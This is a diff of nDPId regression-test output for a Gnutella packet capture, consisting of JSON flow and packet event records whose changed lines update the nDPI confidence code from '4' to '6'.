00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":251768,"flow_last_seen":287699,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":28681,"dst_port":28365,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3598,7 +3598,7 @@ 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287487,"flow_last_seen":287487,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":28681,"dst_port":49737,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287426,"flow_last_seen":287426,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":28681,"dst_port":20347,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287426,"flow_last_seen":287426,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":28681,"dst_port":20347,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287486,"flow_last_seen":287486,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":28681,"dst_port":57492,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287486,"flow_last_seen":287486,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":28681,"dst_port":57492,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287385,"flow_last_seen":287385,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"58.176.62.40","src_port":28681,"dst_port":52889,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3607,7 +3607,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287621,"flow_last_seen":287621,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.149","src_port":28681,"dst_port":54436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287977,"flow_last_seen":288382,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287977,"flow_last_seen":288382,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287857,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2839,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287857,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2839,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287699,"flow_last_seen":287699,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.217.188.105","src_port":28681,"dst_port":62849,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287699,"flow_last_seen":287699,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.217.188.105","src_port":28681,"dst_port":62849,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287654,"flow_last_seen":287654,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.254.140.225","src_port":28681,"dst_port":63637,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3618,7 +3618,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287623,"flow_last_seen":287623,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":53454,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251764,"flow_last_seen":287316,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.165.153.100","src_port":28681,"dst_port":4509,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251764,"flow_last_seen":287316,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.165.153.100","src_port":28681,"dst_port":4509,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287483,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3990,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287483,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3990,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.94.85.113","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.94.85.113","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287523,"flow_last_seen":287523,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.139.21.182","src_port":28681,"dst_port":50110,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3669,7 +3669,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287429,"flow_last_seen":287429,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":28681,"dst_port":4315,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":243616,"flow_last_seen":288106,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":28681,"dst_port":29545,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":243616,"flow_last_seen":288106,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":28681,"dst_port":29545,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":174342,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":841,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":174342,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":841,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287683,"flow_last_seen":287944,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287683,"flow_last_seen":287944,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251763,"flow_last_seen":287316,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.204.130.55","src_port":28681,"dst_port":29545,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3762,7 +3762,7 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6791,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":2,"flow_last_seen":490873,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":490873,"pkt":"CAAn5uVZUlQAEjUCCABFAABJEL8AAEARuWtwaTQCCgACD1uicAkANU8DODExAiD\/PoD\/dZiXmj2bAwEBABYAAACiW3BpNAIfAAAAAACAAMOCVVBDAQEB"} 00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":490916,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":490916,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":490916,"pkt":"CAAn5uVZUlQAEjUCCABFwABUEMAAAH8B9HtBtufoCgACDwMDMuAAAAAARQAAOFJyAAB\/EbOVCgACD0G25+hwCR7SACTlBTqzMQL2cg0m\/8bpadQ5WwMAAQAFAAAAw4JRS0A="} -00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":490916,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.984965} +00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":490916,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.984965} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6793,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":2,"flow_last_seen":490939,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":490939,"pkt":"CAAn5uVZUlQAEjUCCABFAABJEMEAAEAR+rDfEYQSCgACD1uicAkANcVlg9sxAjy4c4P\/utzozFbSAwEBABYAAACiW98RhBJuAAAA+KYpBMOCVVBDACAf"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6794,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":2,"flow_last_seen":490991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":490991,"pkt":"CAAn5uVZUlQAEjUCCABFAABKEMIAAEARTyUOyP\/lCgACD5DCcAkANpg9XGQxAgSi0ID\/hbiT8iWZAwEBABcAAADCkA7I\/+WyNgAAAAAgAMOCUUtEGERIlw=="} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6810,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":491496,"flow_last_seen":491496,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":491496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"23.19.141.110","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -3825,7 +3825,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287355,"flow_last_seen":320291,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.24.129.230","src_port":28681,"dst_port":14766,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287356,"flow_last_seen":320291,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":28681,"dst_port":20387,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287356,"flow_last_seen":320291,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":28681,"dst_port":20387,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":90072,"flow_last_seen":320293,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5333,"flow_avg_l4_payload_len":313,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially 